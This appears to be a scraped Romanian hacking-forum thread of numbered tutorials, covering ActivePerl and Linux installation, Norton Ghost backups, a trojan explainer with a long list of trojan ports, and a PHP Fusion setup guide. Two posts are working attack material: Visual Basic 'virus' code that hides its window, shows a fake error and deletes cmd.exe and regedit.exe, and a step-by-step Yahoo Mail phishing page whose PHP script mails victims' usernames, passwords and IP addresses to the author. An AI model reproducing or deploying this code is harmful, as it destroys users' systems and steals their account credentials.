c:Perl/site/lib/auto/Tk/.packlist editing c:Perl/site/lib/auto/Text/Autoformat/.packlist editing c:Perl/site/lib/auto/Test/Simple/.packlist editing c:Perl/site/lib/auto/Storable/.packlist editing c:Perl/site/lib/auto/SOAP/Lite/.packlist editing c:Perl/site/lib/auto/PPM-Agent-Perl/.packlist editing c:Perl/site/lib/auto/PPM/.packlist editing c:Perl/site/lib/auto/PPM/Shell/.packlist editing c:Perl/site/lib/auto/Net/.packlist editing c:Perl/site/lib/auto/MIME/Base64/.packlist editing c:Perl/site/lib/auto/MD5/.packlist editing c:Perl/site/lib/auto/libwww-perl/.packlist editing c:Perl/site/lib/auto/IO/Zlib/.packlist editing c:Perl/site/lib/auto/HTML-Tree/.packlist editing c:Perl/site/lib/auto/HTML/Tagset/.packlist editing c:Perl/site/lib/auto/HTML/Parser/.packlist editing c:Perl/site/lib/auto/Font/AFM/.packlist editing c:Perl/site/lib/auto/File/CounterFile/.packlist editing c:Perl/site/lib/auto/Digest/.packlist editing c:Perl/site/lib/auto/Digest/SHA1/.packlist editing c:Perl/site/lib/auto/Digest/MD5/.packlist editing c:Perl/site/lib/auto/Digest/MD4/.packlist editing c:Perl/site/lib/auto/Digest/MD2/.packlist editing c:Perl/site/lib/auto/Digest/HMAC/.packlist editing c:Perl/site/lib/auto/Data/Dump/.packlist editing c:Perl/site/lib/auto/Compress/Zlib/.packlist editing c:Perl/site/lib/auto/Archive/Zip/.packlist editing c:Perl/site/lib/auto/Archive/Tar/.packlist editing c:Perl/site/lib/auto/ActiveState/Rx/.packlist editing c:Perl/site/lib/auto/ActiveState/RelocateTree/.packlist editing c:Perl/site/lib/auto/ActivePerl/DocTools/.packlist editing c:Perl/lib/.packlist editing c:Perl/lib/Config.pm editing c:Perl/lib/perllocal.pod editing c:Perl/bin/c2ph.bat editing c:Perl/bin/find2perl.bat editing c:Perl/bin/h2ph.bat editing c:Perl/bin/h2xs.bat editing c:Perl/bin/perlbug.bat editing c:Perl/bin/perlcc.bat editing c:Perl/bin/perldoc.bat editing c:Perl/bin/pl2pm.bat editing c:Perl/bin/pod2html.bat editing c:Perl/bin/pod2latex.bat editing c:Perl/bin/pod2man.bat editing c:Perl/bin/pod2text.bat editing c:Perl/bin/ppm3-bin.cfg editing c:Perl/bin/pstruct.bat editing c:Perl/bin/s2p.bat editing c:Perl/bin/splain.bat cleaning out backups Configuring c:Perl/lib/Config.pm for use in c:Perl... Configuring Perl ... pana aici este bine ... dupa ce a terminat o sa apara : Cod: Thank you for installing ActivePerl! Press return to exit. y si apasati pe ENTER. dupa aceea cautati un exploit, il copiati in notepad si il salvati cu extensia ".pl" . sa zicem ca ati salvat exploitul pe desktop. intrati in cmd si tastati "cd Desktop" si o sa va apara ceva de genul : C:Documents and SettingsxDesktop> dupa aceea scrieti "perl numele_exploitului.pl" si de acolo va descurcati
  18. Instalarea sistemului Ati hotarat sa instalati Linux-ul pe calculator? Foarte bine. Pentru aceasta veti avea nevoie de: 1. calculator (presupun ca-l aveti, altfel cum ati fi citit aceasta pagina?!) 2. CD bootabil cu o distributie Linux 3. o programa buna de partitionare a hard-discului - asa ca Partition Magic 4. o discheta goala 5. timp 6. ceva de mancat si baut (nu radeti, ca e destul de important!) Instalarea in sine, va cuprinde mai multe etape: Partitionarea Daca aveti deja Windows instalat pe calculator si nu doriti sa renuntati complet la el, va trebui sa creati o noua partitie a hard-discului. Nu va temeti, e simplu si nu e nevoie de studii superioare pentru a face aceasta. Necesitatea acestei noi partii ar fi faptul ca Linux si Windows difera foarte mult in ceia ce priveste faptul in care acceseaza hard-discul si modul de gestionare a fisierelor. In majoritatea lor, distributiile Linux vin pe CD impreuna cu un program care face partitia, insa eu v-as recomanda sa folositi programul "Partition Magic" - este cel mai comod in utilizare avand o interfata intuitiva si foarte simplu de folosit. Cu ajutorul acestui program veti crea 2 partitii noi: "LinuxExt" si "LinuxSwap". LinuxExt - Linux extended. Aici se va situa intreg sistemul de operare. Daca doriti sa instalati intrega versiune a SO, veti avea nevoie de aproxmiativ 1.5 gb plus spatiu pe hard-disc pentru fisiere temporare, si alte programe. Insa aveti in vedere ca o instalare "full" inseamna instalarea unui Web server, FTP server, News server etc. Nu cred ca veti avea nevoie de asa ceva pe calculatorul de acasa. De exemplu, pe calculatorul meu Linux ocupa in jur de 280 Mb. La instalare vi se va propune sa selectati ce componente doriti sa fie instalate, insa despre aceasta se va vorbi mai jos. Exista chiar versiuni compacte ale sistemului care se booteaza de pe 3 dischete - dintre care 2 contin softul si nu sistemul de operare insusi! Il puteti gasi aici. Linux Swap - traditional, marimea acestei partitii trebuie sa fie de 2 ori mai mare decat RAM-ul pe care-l aveti, insa in caz daca aveti peste 128 RAM, dispare necesitatea unei partitii de Swap. Instalarea Pentru instalare veti avea nevoie de cat mai multa informatie despre hard-ul dvs. Pentru aceasta in Windows, in My Computer gasiti cat mai multe despre cartela dvs de sunet, cartela video, modem etc. (daca aveti modem intern - posibil e sa nu-l puteti folosi sub Linux ) Sa speram ca ati reusit sa partitionati cu succes hard-discul Dvs fara a formata complet partitia Windows-ului (desi nu ar fi o mare tragedie . Cred ca sunteti gata de marele eveniment. Rugati-i pe toti care ar putea sa va incurce sa mearga in varful degetelor. Dsicul de pa care urmeaza sa instalati Linux-ul ar trebui sa fie bootabil. Pentru ca calculatorul Dvs. sa poata initia de pe el programa de instalare trebuie sa va jucati putin cu setarile din BIOS care ar face ca citirea primara sa se faca de pe CD-ROM. Cred ca a-ti mai facut-o atunci cand ati avut "norocul" sa instalati Windows-ul. Rstartati calculatorul si introduceti CD-ul bootabil in calculator, asteptati pana se initiaza programul de instalare a Linux-ului. Acum sau niciodata. La initiere, programul de instalare va efectua o serie de teste de determinare a configuararii hard-ului calculatorului. Dupa aai, posibil va urma logo-ul distributiei Dvs. mai departe vor urma intrebari extrem de simple: asa ca limba Dvs, tipul tastaturii, mouse etc. (este chiar si romana ). Aici nu cred ca ar avea cineva probleme. Setarea punctului de montare Mici probleme ar putea aparea la alegerea partitiei pe care doriti sa instalati Linux-ul. Ceva intr-o fereastra cu denumirea "Disk Setup". Aici se vor afisa partitiile care sunt pe calculator. Ar trebuie sa vedeti ceva de genul: Mount point Device Requested Actual Type <not set> dev1 XX Mb YY Mb Win95 <SWAP> dev2 XX Mb YY Mb Linux Swap <not set> dev3 XX Mb YY Mb Linux native Nu disperati daca la ecran aveti afisat ceva care putin difera de tabela de mai sus, principalul e sa prindeti ideia. hda1 reprezinta partitia pe care se aflai instalat Windows-ul vostru mult-iubit . Dar cred ca e clar, nu? Cred ca aveti cu totii 9 clase terminate. Aici va trebui sa alegeti partitia (Device) pe care se va instala Linux-ul. Pentru aceasta selecati partitia pe care sta "Linux Native" (in exemplu nostru - hda3) si apasati 'Space'. In fereasta ce va aparea, insemnati punctul de montare cu simbolul '/', apasati OK. Prin aceasta aceasta, ati indicat ca directorul radacina (root directory) sa fie montat pe partitia de Linux Native. FITI ATENTI SA NU ALEGETI ALTA PARTITIE AFARA DE 'LINUX NATIVE', ASA CUM AU FACUT-O DESTUL DE MULTI!!! In continuare va urma un dialog care ar dori sa stie ce partitie sa formateze. Selectati acea partitie pe care se afla Linux Native. Selectati partitia '/dev/hda3' in exemplul de mai sus. Fiti din nou foarte atenti sa nu formatati o alta partitie! Selectarea pachetelor Dupa selectarea partitiei si formatarii ei, va trebuie sa precizati despre ce instalare e vorba: Statie de lucru GNOME, KDE, instalarea unui server sau o actualizare a unui kernel mai vechi (upgrade). Dupa aceia va trebui sa selectati pachetele individuale. Daca ati renuntat la ceva care este indispensabil sistemei veti fi atentionat astfel incat sistema dvs sa poata lucra fara probleme si greseli (nu asa ca... stiti voi cine!). Apasati OK si va incepe instalare. Configurara serviciilor Dupa copierea pachetelor pe hard-disc, veti fi invitat sa configurati X-Windows (interfata grafica pentru Linux numita X). Alegeti tipul de monitor si tipul cartelei grafice ce o avet, daca monitorul dvs nu este in lista, alegeti ceva de genul "generic" si alegeti o rezolutie mai mica la inceput, dup'aia o puteti mari fara probleme. Urmeaza configurarea mouse-lui (simtiti frica? ). Aletgeti, pur si simplu "Generic PS/2 Mouse". Dupa aia, alegerea orei si luni (intrebati pe cineva mai mare ca sa fiti mai siguri . Veti mai fi intrebat daca doriti ca interfata grafica, X-Windows, sa fie interfata implicita. Daca sunteti un incepator cu 'I' mare selectati aceasta optiune, daca nu, puteti porni interfata grafica oricand cu comanda 'startx'. Ultima ce vai mai ramas e sa configurati o imprimanta. Utilizatorii Linux este un sistem multi-utilizator. Desi e cel mai probabil ca veti folosi calculatorul de unul singur, pentru comoditatea dvs ar fi bine sa creati mai multe conturi de utilizatori. In primul rand, un cont de 'administrator' (root, super-user) - cel care are cele mai mari drepturi in sistem. Veti folositi acest cont pentru a intretine si a administra sistemul. Insa faptul de a avea drepturi absolute in sistem ar putea facilita distrugerea lui de catre incepatori, de aia e indicat sa creati un cont de utilizator cu drepturi limitate care v-ar impiedica de la actiuni stupide. Insa puteti in orice clipa sa reveniti la statutul de 'super - urilizator' cu comanda 'su'. Alegeti o parola de 'root'. De exemplu, parola mea de root este 'bugmafia' - adica ceva foarte simplu deoarece am incredere in cei din familia mea )))). Nu cred ca e nevoie de accese excesive de paranoia, nu cred sa fie foarte multi care si-ar vinde sufletul ca sa patrunda in sistemul dvs. Lucruri mult mai urate pot fi facute sistemului dvs de catre atacatori fara ca ei sa aiba cea mai mica ideie de parola dvs de administrator. Asa ca, conteaza administrarea, nu parola ei. Dupa configurarea contului de root, veti fi invitat sa creati un cont mai putin privelegiat - acest cont va fi folosit in mod normal - mai ales cand stati pe Net. Bootarea Ultima faza, este selectarea modului in care doriti ca sa starteze Linux-ul. Cel mai comod ar fi sa configurati LILO (adica LInux LOad). In acest caz, pe sectorul zero al hard discului (de pe care se incarca sitemul operationl) se inscrie programa care propune la start-up optiunea de a incarca Windows-ul sau Linux-ul. La prima vedere aceasta ar fi cea mai comoda metoda. Asa si este, insa in cazul reinstalarii Windows-ului (o data in 2 saptamani in cazul meu) el va scri informatia despre incarcarea sa pe sectorul zero peste LILO, stergandu-l. Cu alte cuvinte, daca reinstalati Windows-ul nu veti mai avea acces la Linux . Esirea din situatie ar fi utilizarea unei dischete de boot de pe care s-ar porni Linux-ul. Cand veti dori sa folositi Linux-ul, pur si simplu la start-up veti introduce discheta si Linux-ul se va porni de pe ea (desigur va trebui sa va jucati putin la setarile din BIOS), cand veti dori sa folositi Windows (mai cade lumea in pacat:( ) pur si simplu porniti calculatorul ca inainte - insa fara discheta Linux! Restart & Enjoy Restartati calculatorul, in BIOS schimbati setarile ca stfel ca incarcarea sistemului sa se faca de pe discheta. Nu uitati sa introduceti discheta. Veti vedea un prompt de tipul: LILO Press 'Enter' (or wait 10 seconds) to boot your Red Hat System from /dev/hda3. You may override your default kernel parameters by typing "Linux <params>" if you like. boot: Apasati 'Enter' (sau asteptati 10 secunde, daca sunteti un om foarte rabadator J si... va porni Linux-ul! Yeehaw!!! Dar nu strigati prea tare... Credits: http://old.ournet.md
  19. http://rapidshare.com/files/50007371/carti.rar.html spor la invatzat
  20. Clonarea Windows-ului pentru zile negre. Este un proces simplu care te scuteste de o a doua formatare + reinstalare a sistemului de operare + a tuturor programelor. Treaba dureaza mai putin de 5 minute [in esenta, depinde de viteza de citire/scriere a HDD-ului] si consta in crearea unei imagini a partitiei care contine Windows-ul pe o alta partitie. Practic, se arhiveaza continutul C-ului intr-un fisier cu extensia .GHO intr-un loc la alegere. Programul care face asta se numeste Norton Ghost si este integrat, alaturi de alte utilitare, intr-un CD cu numele de Hiren's Bood CD. Versiunea pe care o folosesc eu Deschiderea programului Norton Ghost Boot-ezi de pe CD -> 2. Disk Clone Tools -> 2. Norton Ghost 8.2 -> 3. Ghost -> "Swap files" [enter sau astepti cateva secunde si se lanseaza Ghost-ul]. Salvarea imaginii "ghost": Dupa ce ai trecut de Welcome Screen: Local -> Partition -> To Image -> Select local source drive [enter] -> Source partition [enter] -> File name to copy to [cauti locul in care vrei sa salvezi imaginea de ~2 GB, dai nume la fisier] -> Compress [Fast] -> Yes -> astepti sa termine, dupa care Reset Computer. Restore fresh Windows: *Repeti pasii de mai sus, pana la lansarea Ghost-ului. Local -> Partition -> From Image -> Source Partition [alegi partitia pe care se afla fisierul .GHO] -> Local Destination Drive [alegi HDD-ul pe care se afla partitia-destinatie - in cazul in care ai mai multe HDD-uri] -> Destination Partition [te asiguri ca e selectat Primary si verifici marimea partitiei, pentru siguranta, sa nu rescrii altundeva] -> Yes -> astepti sa termine, dai restart si..voila, nu tu reg cleaners si altele, it's as good as new
  21. Pai majoritatea cred ca virusii se aseamana cu Trojanii lucru deloc adevarat. Un virus nu este asa de imposibil de realizat odata ce intelegeti diferentele dintre Trojani si Virusi. O sa incepem cu ceva foarte simplu. Acum totul depinde de cum vrei tu ca virusul tau sa lucreze, Eu sunt de parere ca cel mai bine e ca el sa se activeze odata cu deschiderea aplicatiei asa ca main code se codeaza in form load sub. In proiectul nostru inseram un text box , un buton de comanda si un timer,vom folosii butonul si timerul putin mai incolo. Acest exemplu de virus sterge ceva anume acum vom adauga ce anume sterge in cod. Code: Private Sub Form_Load() Text1.Text = "C:/Windows/System32/cmd.exe Kill Text1.Text End Sub Acest cod explica cum odata deschisa aplicatia se sterge cmd.exe din System32 automat. Acum vom pune si un buton il vom denumi "A" Pune urmatorul cod in butoul de comanda si in form load. Code: Private Sub Form_Load() Text1.Text = "C/Windows/System32/cmd.exe" A = Text1.Text End Sub Private Sub Command1_Click Kill A End Sub Asa.... odata ce butonul va fii apasat va sterge cmd.exe Acum la codul urmator vom folosii timer. Code: Private Sub Form_Load() Form1.Visible = False Text1.Text = "C:/Windows/System32/cmd.exe" A = Text1.Text Msgbox ("Runtime Error 492. Not Enough Memory."), vbCritical, "Runtime Error" End Sub Private Sub Timer1_Timer() Timer1.Interval = 5000 Kill A Timer1.Enabled = False End Sub Ceea ce am facut mai sus este sa facem formul invizibil si sa dea un mesaj eroare ce pare a fii real, am setat intervalul la 5 secunde pana ce fisierul va fii sters si vedeti cat de simplu este sa pacaliti pe cineva. Codul de jos nu va folosii timere butoane va da un mesaj error dupa care pur si simplu va sterge mai multe fisiere. Code: Private Sub Form_Load() Form1.Visible = False Msgbox ("Runtime Error 492. Not Enough Memory."), vbCritical, "Runtime Error" Kill "C:/Windows/System32/cmd.exe" s Kill "C:/Windows/regedit.exe" End Sub Acesta va sterge regedit.exe si cmd.exe si va spune Runtime Error 492. Not Enough Memory ( il puteti personaliza cu ce doriti ) Succes.
  22. Ce este un Trojan Horse?(Cal troian) -Un program neautorizat introdus in PC clandestin.Acest program ruleaza aplicatii necunoscute(si probabil nedorite) de user. -Orice program care functioneaza obligatoriu si nepermis ,aplicand operatii necunoscut(si probabil nedorite ) de user -Un program "autorizat" care pare ca functioneaza pe baza unui cod neautorizat ;codul produce activitati necunoscute(si probabil nedorite ) de user Pe scurt,e ceva ce nu vrei sa ai in PC tau Trojanul in ziua de astazi Trojanul mai poate fi numit si RAT(Remote Administration Tools) Trojan Horse a fost intodeauna o mare problema de securitate.Majoritatea persoanelor nu stiu ce este un trojan cu adevarat,si continua sa downloadeze documente din surse de neincredere sau persoane suspicioase.In ziua de azi exista peste 800 de definiti de trojani pe care eu ii stiu dar cred ca sunt mult mai multi,deoarece fiecare hacker/cracker care se respecta are o definitie proprie de trojan Viitorul Trojanilor Multe persoane cred ca trojani sunt depasiti si ca nu au nici un viitor.Eu nu as spune asta.Trojani sunt din ce in ce mai performanti si de fiecare data se adauga cate un lucru nou la ei. Sunt Trojani care sunt COMPLETI ascunsi in sistem si uni,restarteaza sistemul de operare de fiecare data cand acesta este deschis. Persoanele care fac acesti virusi au multe idei cea ce le face Virusul Unic. Trojani se fac zilnic de diferiti hackeri,acestia fiind imbunatatiti si cu o encriptie mai buna. Programele Antyi-Trojan intradevar,te apare de trojani dar pe internet apar sute de definitii noi. Acestia se pot infiltra oriune in computer,asa ca aveti grijade unde si ce downloadati. Anti-Virusi Multe persoane cred ca daca au un anti-virus upgradat la zii sunt compplet protejati de threaturile ce umbla pe internet si de accesul altor persoane in computerul lor.Acest lucru NU este adevarat.Dupa cum spuneam in Lumea sunt peste 800 trojani iar un anti-virus are cel mult 200 de definitii.Cel mai Sigur ar fi sa va instalati un program FIREWALL!!Dar nici asa nu sunteti securizati in totalitate!!Din nou oamenii cred ca PC lor sunt in siguranta! Cum te poti infecta De la ICQ De la IRC De la atasamente De la alte persoane(remote control) Diferite harduri(CD,disckete etc.) Cat de periculos poate fi un Trojan? Multe persoane care nu stiu ce este un trojan cred ca atunci cand ruleaza un fisier executabil nu se intampla nimic deoarece toate fisierele sunt intacte si nimic nu se intampla dar nu asa sta treaba... poate: Cineva downloadeaza si uploadeaza fisiere in pc tau. Cineva iti citeste toate discutiile de pe IRC si afla lucruri interesante despre prieteni tai. Cineva iti citeste toate mesajele ICQ Cineva sterge fisierele din PC-ul tau Diferite feluri de trojani -Remote Acces Trojan (RAT) Acesta este cel mai folosit si cel mai cautat trojan deoarece oricine vrea sa detina controlul asupra informatiilor victimei. -Trojani ce trimit parola(Password Sending Trojans) Aceste programe ajuta la spargerea diferitelor acounturi,in special cele de e-mail cu ajutorul emailurilor false -Keyloggers Ajuta la aflarea diferitelor parola si deobicei PC este restartat de fiecare data cand OS(sistemul de operare) este pornit -Destructiv Scopul:stergerea fisierelor vitale pt un PC. -FTP Trojans Acesti Trojani deschid portul 21 pe PC-ul tau lasan pe ORICINE sa se conecteze la PC-ul tau fara niciun fel de acord sau parola. Acestia sunt cei mai comuni trojani,toti sunt periculosi asa ca aveti grija cum ii folositi. Cum te pot infecta?? De obicei te poti infecta de la toti cei ce stiu sa foloseasca un trojan(e FOARTE usor),si desigur cei care stiu sa te invefcteze pe TINE.Majoritatea Hackerilor invata cum sa foloseasca un trojan si e obicei raman la acelasi nivel ceea ce ii face niste lameri.pt ca un trojan este simplu de operat. Dupa ce veti citi textul acesta veti vedea toate metodele comune pt infectari. Ce cauta Atacatorul?? Uni dintre voi pot crede ca trojani sunt facuti numai ca sa distruga,dar majoritatea sut proiectati pentru spyonarea altor PC-uri. Uitati o lista cu lucrurile pe care le-ar putea -----> Informatii legate de cartile de credit -----> Verificare informatiloor a diferite acounturi -----> Baza de date -----> Lista de mailuri -----> Adresa personala -----> Adresa de e-mail -----> Parolele acounturilor -----> Informatii private / Informatii despre mici afaceri -----> Infeormati despe acounturi ale diverse compani -----> Rezumate -----> Servicii pe care el le poate realiza -----> Numele tau complet -----> Date despre familia ta -----> Adresa ta -----> Nr tau de telefon -----> Scrisorile tale -----> Diferite poze -----> School work -----> Informatii despre acounturi la scoala Cum functioneaza Trojani?? Cand victima deschide serverul functioneaza pe baza deschiderii uni anumit port si cauta conexiuni.Poate folosi protocoale TCP sau UPC.Cand esti conectat la ip-ul victimei poti face orice te lasa serverul sa faci.Uni trojani restarteaza OS de fiecare data cand acesta sa incarcat.Ei modifica sfisierele win.ini sau system.ini ca trojanul sa se poata restarta dar majoritatea trojanilor noi folosesc registre.Victima porneste serverul ,atacatorul trimite comanda,acesta este principiul de baza. Cele mai intalnite porturi prin care trojani actioneaza: Satanz Backdoor|666 Silencer|1001 Shivka-Burka|1600 SpySender|1807 Shockrave|1981 WebEx|1001 Doly Trojan|1011 Psyber Stream Server|1170 Ultors Trojan|1234 VooDoo Doll|1245 FTP99CMP|1492 BackDoor|1999 Trojan Cow|2001 Ripper|2023 Bugs|2115 Deep Throat|2140 The Invasor|2140 Phineas Phucker|2801 Masters Paradise|30129 Portal of Doom|3700 WinCrash|4092 ICQTrojan|4590 Sockets de Troie|5000 Sockets de Troie 1.x|5001 Firehotcker|5321 Blade Runner|5400 Blade Runner 1.x|5401 Blade Runner 2.x|5402 Robo-Hack|5569 DeepThroat|6670 DeepThroat|6771 GateCrasher|6969 Priority|6969 Remote Grab|7000 NetMonitor|7300 NetMonitor 1.x|7301 NetMonitor 2.x|7306 NetMonitor 3.x|7307 NetMonitor 4.x|7308 ICKiller|7789 Portal of Doom|9872 Portal of Doom 1.x|9873 Portal of Doom 2.x|9874 Portal of Doom 3.x|9875 Portal of Doom 4.x|10067 Portal of Doom 5.x|10167 iNi-Killer|9989 Senna Spy|11000 Progenic trojan|11223 Hack?99 KeyLogger|12223 GabanBus|1245 NetBus|1245 Whack-a-mole|12361 Whack-a-mole 1.x|12362 Priority|16969 Millennium|20001 NetBus 2 Pro|20034 GirlFriend|21544 Prosiak|22222 Prosiak|33333 Evil FTP|23456 Ugly FTP|23456 Delta|26274 Back Orifice|31337 Back Orifice|31338 DeepBO|31338 NetSpy DK|31339 BOWhack|31666 BigGluck|34324 The Spy|40412 Masters Paradise|40421 Masters Paradise 1.x|40422 Masters Paradise 2.x|40423 Masters Paradise 3.x|40426 Sockets de Troie|50505 Fore|50766 Remote Windows Shutdown|53001 Telecommando|61466 Devil|65000 The tHing|6400 NetBus 1.x|12346 NetBus Pro 20034 SubSeven|1243 NetSphere|30100 Silencer |1001 Millenium |20000 Devil 1.03 |65000 NetMonitor| 7306 Streaming Audio Trojan| 1170 Socket23 |30303 Gatecrasher |6969 Telecommando | 61466 Gjamer |12076 IcqTrojen| 4950 Priotrity |16969 Vodoo | 1245 Wincrash | 5742 Wincrash2| 2583 Netspy |1033 ShockRave | 1981 Stealth Spy |555 Pass Ripper |2023 Attack FTP |666 GirlFriend | 21554 Fore, Schwindler| 50766 Tiny Telnet Server| 34324 Kuang |30999 Senna Spy Trojans| 11000 WhackJob | 23456 Phase0 | 555 BladeRunner | 5400 IcqTrojan | 4950 InIkiller | 9989 PortalOfDoom | 9872 ProgenicTrojan | 11223 Prosiak 0.47 | 22222 RemoteWindowsShutdown | 53001 RoboHack |5569 Silencer | 1001 Striker | 2565 TheSpy | 40412 TrojanCow | 2001 UglyFtp | 23456 WebEx |1001 Backdoor | 1999 Phineas | 2801 Psyber Streaming Server | 1509 Indoctrination | 6939 Hackers Paradise | 456 Doly Trojan | 1011 FTP99CMP | 1492 Shiva Burka | 1600 Remote Windows Shutdown | 53001 BigGluck, | 34324 NetSpy DK | 31339 Hack?99 KeyLogger | 12223 iNi-Killer | 9989 ICQKiller | 7789 Portal of Doom | 9875 Firehotcker | 5321 Master Paradise |40423 BO jammerkillahV | 121 Cum imi pot monitoriza PC fara sa il scanez?? Din nou,masele cred ca daca ai un Trojan-scanner sau un Anti-Virus esti protejat 100%.Ei bine aceasta nu este cea mai buna metoda,cea mai buna metoda este sa verifici chiar tu insuti.Verifica ce porturi sunt deschise si comparale cu cele ,cele mai folosite de trojani.Acest lucru se face Scriin in CMD "netstat".Dar cea mai buna metoda este sa va instalati un program de tip Firewall,acesta este cel mai eficient. Sfaturi: -Niciodata nu accepta fisiere de la alte persoane chiar daca iti este prieten -Cand rulezi un fisier verificai extensia -Intodeauna monitorizezati porturile -Downloadeaza softuri doar din pagina oficiala Tutorialul este rezumat si este facut si pentru cei fara experienta
  23. Cum Sa Faci Un Scam Page 1) Pentru inceput sa va zic cateva chesti : - tr sa aveti habar de notiuni html de baza {pe draq tr sa shti modifica unde va zic yo ) } - este foarte simplu - iti tr 2 siteuri pe net 1 pe lx iar celalalte 0server.com {sau orice site } 2) Ce Este Un Scam Page ? Scam Page: este o pagina flasa, cu care poti afla date destul de inportante despre cineva {in acest tutorial voi prezenta un Yahoo Mail Scam Page} 3) Hai Sa Facem Pagina Scam{partea I [faza in html]} acum trebuie sa intram pe site-ul respectiv(in exemplu nostru mail.yahoo.com), apasam ctrl + u {o sa ne arate sursa pagini} iar noi nu tr decat sa selectam tot{absolut tot} si sa intram in notepad si dam paste. Noi am copiat pagina iar acum o sa trebuiasca sa cautam linia: <fieldset> <legend>Login Form</legend> <form method="post" action="[Only Registered And Activated Users Can See Links]" autocomplete="off" name="login_form"> <input type="hidden" name=".tries" value="1"> <input type="hidden" name=".src" value="ym"> <input type="hidden" name=".md5" value=""> <input type="hidden" name=".hash" value=""> <input type="hidden" name=".js" value=""> <input type="hidden" name=".last" value=""> <input type="hidden" name="promo" value=""> <input type="hidden" name=".intl" value="us"> <input type="hidden" name=".bypass" value=""> <input type="hidden" name=".partner" value=""> <input type="hidden" name=".u" value="fvbi1kp2qhfik"> <input type="hidden" name=".v" value="0"> <input type="hidden" name=".challenge" value="EcsMm4_xIivGoDgBoxxTDyOfV4T9"> <input type="hidden" name=".yplus" value=""> <input type="hidden" name=".emailCode" value=""> <input type="hidden" name="pkg" value=""> <input type="hidden" name="stepid" value=""> <input type="hidden" name=".ev" value=""> <input type="hidden" name="hasMsgr" value="0"> <input type="hidden" name=".chkP" value="Y"> <input type="hidden" name=".done" value="[Only Registered And Activated Users Can See Links]"> <input type="hidden" name=".pd" value="ym_ver%3d0"> din ea tr sa shtergi <input type="hidden" name=".tries" value="1"> <input type="hidden" name=".src" value="ym"> <input type="hidden" name=".md5" value=""> <input type="hidden" name=".hash" value=""> <input type="hidden" name=".js" value=""> <input type="hidden" name=".last" value=""> <input type="hidden" name="promo" value=""> <input type="hidden" name=".intl" value="us"> <input type="hidden" name=".bypass" value=""> <input type="hidden" name=".partner" value=""> <input type="hidden" name=".u" value="fvbi1kp2qhfik"> <input type="hidden" name=".v" value="0"> <input type="hidden" name=".challenge" value="EcsMm4_xIivGoDgBoxxTDyOfV4T9"> <input type="hidden" name=".yplus" value=""> <input type="hidden" name=".emailCode" value=""> <input type="hidden" name="pkg" value=""> <input type="hidden" name="stepid" value=""> <input type="hidden" name=".ev" value=""> <input type="hidden" name="hasMsgr" value="0"> <input type="hidden" name=".chkP" value="Y"> <input type="hidden" name=".done" value="[Only Registered And Activated Users Can See Links]"> <input type="hidden" name=".pd" value="ym_ver%3d0"> iar la linia: <form method="post" action="[Only Registered And Activated Users Can See Links]" autocomplete="off" name="login_form"> tr scris in loc de [Only Registered And Activated Users Can See Links] tr sa scri [Only Registered And Activated Users Can See Links] p.s. ar fi de preferat sa shtergi si linia Code: <script language="JavaScript" type="text/javascript">if(document.getElementById) document.getElementById('username').focus();</script> cam atata aicea in index.html 4)s.php {partea ce iti trimite in email user, parola + ip(o sa mai poti adauga si alte date ... )} Code: <?php $ip = getenv("REMOTE_ADDR"); $message .= "User : ".$_POST['login']."n"; $message .= "PassWord: " .$_POST['passwd']."n"; $recipient = "hackeru_dani @ yahoo.com"; $subject = "New Losser"; $headers = "From: "; $headers .= $_POST['eMailAdd']."n"; $headers .= "MIME-Version: 1.0n"; mail("$cc", "yahoo Info", $message); if (mail($recipient,$subject,$message,$headers)) { header("Location: [Only Registered And Activated Users Can See Links]"); } else { echo "ERROR! Please go back and try again."; } ?> in loc de E-mail tr sa scrii email`u tau Cam Asta a fost tot, acum poti sa iti faci scam page acum celelate varabilitati din afara de ip : dar cum puteti si vedea pentru a aparea ip`u o fost scris $ip = getenv['REMOTE_ADDR']; , exact cam acelasi lutru tr si pentru restu nu conteaza daca scrie "$ip= ..." poate sa scrie "$fuck= ..." dar conteaza mult ce scrie dupa egal, cam ce scrie dupa egal tr sa aiba forma $_SERVER['NUME_NUME']; unde nume poate fi : SERVER_ADDR - adresa serverului pe care e rulat scriptul [Only Registered And Activated Users Can See Links] - browserul folosit de client REMOTE_HOST - ca REMOTE_ADDR, doar ca iti returneaza hostul, nu IP-ul REMOTE_PORT - portul pe partea de client care este folosit pentru comunicarea cu serverul PHP_AUTH_USER si PHP_AUTH_PW sunt folosite cand te autentifici prin apache ( .htaccess ). Iti spune userul si parola care le-ai introdus in caseta de dialog. restu pot fi gasite AICEA iti dau un ex pentru s.php cu cam multe prosti de alea: Code: <?php $ip = getenv("REMOTE_ADDR"); $bro = $_SERVER['[Only Registered And Activated Users Can See Links]']; $host = $_SERVER['REMOTE_HOST']; $port = $_SERVER['REMOTE_PORT']; $message .= "User : ".$_POST['login']."n"; $message .= "PassWord: " .$_POST['passwd']."n"; $message .= "IP: ".$ip"n " $message .= "host: ".$host"n"; $message .= "browserul: ".$bro"n"; $message .= "PORT: ".$port"n"; $recipient = "hackeru_dani @ yahoo.com"; $subject = "New Losser"; $headers = "From: "; $headers .= $_POST['eMailAdd']."n"; $headers .= "MIME-Version: 1.0n"; if (mail($recipient,$subject,$message,$headers)) { header("Location: [Only Registered And Activated Users Can See Links]"); } else { echo "ERROR! Please go back and try again."; } ?> Credit:nu scria..
  24. In acest tutorial o sa incerc sa va explic cat mai detaliat cum se instaleaza CMS-ul PHP Fusion pentru cei care nu stiu.Pachetul cu PHP Fusion il puteti descarca de AICI ([Only Registered And Activated Users Can See Links]) Primul pas este de a va lua un host free sau platit,dupa preferinte cateva hosturi bune sunt [Only Registered And Activated Users Can See Links] ([Only Registered And Activated Users Can See Links]) , [Only Registered And Activated Users Can See Links] ([Only Registered And Activated Users Can See Links]) , [Only Registered And Activated Users Can See Links] ([Only Registered And Activated Users Can See Links]) si [Only Registered And Activated Users Can See Links] ([Only Registered And Activated Users Can See Links]) .Dupa aceea creati o baza de date mysql si un user cu o parola(acestea trebuie retinute) din panoul de control de pe serverul de gãzduire al sitului sau phpMyAdmin.Dupa aceea redenumeste blank_config.php in config.php.Uploadeaza toate fisierele pe host preferabil prin FTP.Dupa uploadarea completa intram pe FTP si setam CHMOD 777 pentru urmatoarele fisiere si foldere(informatii despre CHMOD gasiti AICI ([Only Registered And Activated Users Can See Links]) ) : administration/db_backups/ images/ images/imagelist.js images/articles/ images/avatars/ images/news/ images/news_cats/ images/photoalbum/ images/photoalbum/submissions/ forum/attachments/ config.php Acum intri pe siteul tau.Ar trebui sa apara pe ecran instalarea(daca nu apare scrii in bara de la browser [Only Registered And Activated Users Can See Links] . Urmezi Pasii de pe ecran(atentie la prima casuta lasati localhost nu schimbati,restul e simplu).Dupa finalizare 